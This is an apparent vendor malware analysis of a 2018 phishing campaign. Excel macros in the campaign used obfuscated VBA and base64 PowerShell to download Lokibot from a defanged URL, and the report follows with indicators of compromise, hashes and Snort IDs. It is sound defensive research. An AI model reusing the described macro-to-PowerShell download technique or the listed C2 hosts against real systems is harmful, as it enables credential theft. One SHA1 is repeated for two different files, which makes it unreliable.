Between February 14 and February 16 in 2018, NTT Security clients began observing emails with file attachments with the naming convention, ‘CALIS PO [0-9]{6}.XLS’.  The Excel file attachments contained malicious macros which then installed Lokibot, an information stealing malware commonly sold on Russian underground forums.


Stage 1: Phishing Email


The phishing emails used in this campaign came from admin@dealer[.]com, delivering excel files with the file naming convention, ‘CALIS PO [0-9]{6}.XLS’. In this analysis, we will be analyzing an a phishing attempt sent from 159.89.162[.]58. Table 1. details the file characteristics of the excel attachment.


Stage 2: Malware Install via Macro


Typically phishing attacks use Microsoft Office documents which contain malicious visual basic for applications (VBA) macros, object linking and embedding (OLE) streams, and/or dynamic data exchange (DDE) fields to accomplish the installation of the first stage malware. Using oledump, a popular analysis tool for phishing documents, it was determined several macros existed. Based on size and name, GTIC started analysis with ‘_VBA_PROJECT_CUR/VBA/AjSKhwXEZKaDCNlf’, as shown in the oledump results below.

Figure 1: oledump results on the excel phishing document (662ab84c754f4a74cb74a965fa719df8).

After extracting the VBA macro, a brief static analysis showed the macro used obfuscation to make analysis difficult. At a glance, there were several procedures which contained calls to the following functions:  

         CreateObject(‘WsCRiPt.shELL’) - Used in VBScripting to use the native command-line

         createElement(‘AUMLfTIlsL’) – Creates a new element node

         qUTAkhttxBskryuWcZnJTaXhTwetsBulFcuhrzQavsvzObxtUjHjDn(‘UuGKQ’) – Primary function


Figure 2: This image shows a portion of the VBA macro with several parts of a larger base64 encoded string.

Using ViperMonkey, a VBA parsing and emulation tool by Philippe Lagadec at Decalage.info, GTIC was able to decode the obfuscated strings and learn more about the macro itself. 

Throughout the macro, a variable known as ‘UuGKQ’ is used to store several different strings which concatenate to one large base64 string as shown below. This string is then passed over to the qUTAkhttxBskryuWcZnJTaXhTwetsBulFcuhrzQavsvzObxtUjHjDn() function where it is then decoded. 


Figure 3: This image shows parts of base64 strings being concatenated throughout the VBA macro to build one large base64 string.

The decoded form of this base64 string becomes the parameters for a ‘WsCRiPt.shELL’ object which relies on Powershell (PS) and another base64 string. Decoded, this base64 string is actually a PS script that uses the Net.WebClient class to download malware from hxxps://comfy[.]moe/uuoovq.jpg onto the victim’s machine directly into $env:USERPROFILE, with the filename ‘ubPDnILodwXSQYiPXec.exe’

Figure 4: This image shows the command used by this VBA macro to download the malware.


Stage 3: Lokibot Setup and C2 Communication

Upon execution, callbacks to the command and control (C2) host at speedneedoxyz[.]xyz/calis/fre.php occur, as shown in the network traffic capture below. This request is to report a new infection and any private data stolen during the process. Based on the user-agent (HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno)) used and the URI, GTIC confidentially determined this malware to be Lokibot. 

Figure 5: This image shows network traffic from lokibot to the C2 server at speedneedoxyz[.]xyz.

Lokibot is a commodity-based malware sold on underground sites and used to steal private data. Lokibot is commonly distributed via phishing attacks leveraging file attachments with malicious macros and OLE objects. As shown in Figure 5., Lokibot will commonly make C2 calls to a ‘fre.php’ file, which records the infection and any stolen information. This phishing process is very straight to the point, but effective.

Technical Indicators


IPv4 Addresses:

159.89.162[.]58

31.220.104[.]230

 

Domains:

speedneedoxyz[.]xyz

ckav[.]ru

9bis[.]com


URLs:

speedneedoxyz[.]xyz/calis/fre.php


Hashes:

662ab84c754f4a74cb74a965fa719df8 (Phishing Email MD5)

048d3f55f3fd3bf9e1f125f8a6859fba8c84b30b (Phishing Email SHA1)

f292e8ea2ee8fd6e52e3b874e754f14cdfc1c48a90acb7a55bbb5f5ac604d2de (Phishing Email SHA256)

c058bf95eb7b4c9b25e7451bc2ab9f48 (Lokibot MD5)

048d3f55f3fd3bf9e1f125f8a6859fba8c84b30b (Lokibot SHA1)

d43a3bed09296efd7978429ac4c475eda2740b67ca6ef61cfc04c1b2397984eb (Lokibot SHA256)

 

Miscellaneous

Public Samples:

https://www.virustotal.com/#/file/d43a3bed09296efd7978429ac4c475eda2740b67ca6ef61cfc04c1b2397984eb/detection - Lokibot Sample

https://www.hybrid-analysis.com/sample/d43a3bed09296efd7978429ac4c475eda2740b67ca6ef61cfc04c1b2397984eb?environmentId=100 - Lokibot Sample

https://www.hybrid-analysis.com/sample/f292e8ea2ee8fd6e52e3b874e754f14cdfc1c48a90acb7a55bbb5f5ac604d2de?environmentId=100 Phishing Excel Document


Snort Signatures:

2021641

2021641

2021641

2024312

2024317

2024312

2024313

2024317

2024318